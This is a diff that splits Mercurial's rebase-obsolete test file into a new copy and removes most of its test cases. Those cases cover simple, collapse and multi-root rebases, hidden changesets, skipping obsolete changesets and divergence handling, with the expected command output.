tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete3.t @@ -18,1032 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - Divergence cases due to obsolete changesets ------------------------------------------- @@ -1650,489 +624,3 @@ Z $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - 